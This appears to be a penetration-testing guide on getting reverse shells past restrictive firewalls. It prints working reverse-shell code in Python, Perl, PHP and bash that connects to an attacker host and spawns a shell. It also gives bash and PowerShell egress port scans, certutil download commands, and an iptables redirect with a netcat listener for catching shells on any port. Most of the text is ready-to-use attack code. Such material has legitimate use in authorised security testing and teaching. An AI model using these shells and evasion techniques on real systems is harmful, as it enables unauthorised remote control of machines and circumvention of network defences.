Common Failure Scenarios
When a reverse shell connection attempt fails, it is typically due to one of four restrictive configurations: missing command execution capabilities, strict outbound IP filtering, blocked outbound ports, or protocol-specific firewall rules. Identifying the specific restriction is the first step toward selecting an appropriate bypass method.
Execution Environment Limitations
Even if network connectivity exists, the target system may lack the necessary binaries or permissions to execute a standard shell. While bash is the most common target, alternative languages can be used if the interpreter is available.
Python Execution
import socket, subprocess, os, pty
host = '10.0.0.5'
port = 8888
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
os.dup2(sock.fileno(), 0)
os.dup2(sock.fileno(), 1)
os.dup2(sock.fileno(), 2)
pty.spawn("/bin/bash")
sock.close()Perl Execution
use Socket;
my $target_ip = '10.0.0.5';
my $target_port = 8888;
socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(S, sockaddr_in($target_port, inet_aton($target_ip)))) {
open(STDIN, ">&S");
open(STDOUT, ">&S");
open(STDERR, ">&S");
exec("/bin/sh -i");
};PHP Execution
$sock = fsockopen("10.0.0.5", 8888);
exec("/bin/sh -i <&3 >&3 2>&3");Bash Alternative
exec 5<>/dev/tcp/10.0.0.5/8888
while read line 0<&5; do $line 2>&5 >&5; doneStrict Egress IP Filtering
If the firewall is configured to whitelist specific outbound IPs, a reverse shell will fail unless the attacker's IP is on that list. In this scenario, the only viable option is to pivot through a compromised host within the allowed network range to relay the traffic.
Protocol Restrictions
Firewalls may allow traffic only on specific protocols such as HTTP, DNS, or ICMP. Detecting allowed protocols helps in choosing the right exfiltration or tunneling method.
Testing HTTP/HTTPS
On Linux, standard tools like curl or wget can verify connectivity.
curl -I http://192.168.1.100
wget --spider http://192.168.1.100On Windows, use PowerShell or system utilities.
powershell -Command "Invoke-WebRequest -Uri http://192.168.1.100 -UseBasicParsing"
certutil -urlcache -split -f http://192.168.1.100/test.txtTesting ICMP
Use tcpdump or tshark on the listening server to confirm if ICMP packets traverse the firewall.
sudo tcpdump -i eth0 icmp
# Or using tshark
sudo tshark -i eth0 -f "icmp"Testing DNS
Verify if the target can resolve external domains using nslookup or dig.
nslookup example.com
dig example.com @8.8.8.8Outbound Port Filtering
When only specific ports are allowed for outbound traffic, identifying these open ports is necessary. The following scripts scan common ports to test connectivity.
Linux Port Scanning
Using bash built-ins to check connectivity against a known external host (e.g., 8.8.8.8).
for port in 80 443 53 8080 21 22; do
timeout 1 bash -c "echo > /dev/tcp/8.8.8.8/$port" && echo "Port $port is open" || echo "Port $port is closed"
doneWindows Port Scanning
Using PowerShell with .NET classes to test port availability.
$ports = 80, 443, 8080, 53
$target = "8.8.8.8"
foreach ($p in $ports) {
try {
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect($target, $p)
Write-Host "Port $p open"
$client.Close()
} catch {
Write-Host "Port $p closed"
}
}Catching Traffic on Any Port
Instead of guessing the open port, iptables can be configured on the attack server to redirect traffic from all ports to a single listener. This allows the attacker to listen on any interface and capture the connection regardless of the source port used by the target.
# Save current rules
iptables-save > /tmp/iptables_backup.rules
# Redirect all TCP traffic (excluding system ports) to port 4444
iptables -t nat -A PREROUTING -p tcp --dport 1025:65535 -j REDIRECT --to-ports 4444
# Start the listener
nc -lvnp 4444
# Restore rules after the session
iptables-restore < /tmp/iptables_backup.rulesIf the environment permits, using Metasploit payloads such as reverse_tcp_allports can automate this process by attempting connections across multiple ports until one succeeds.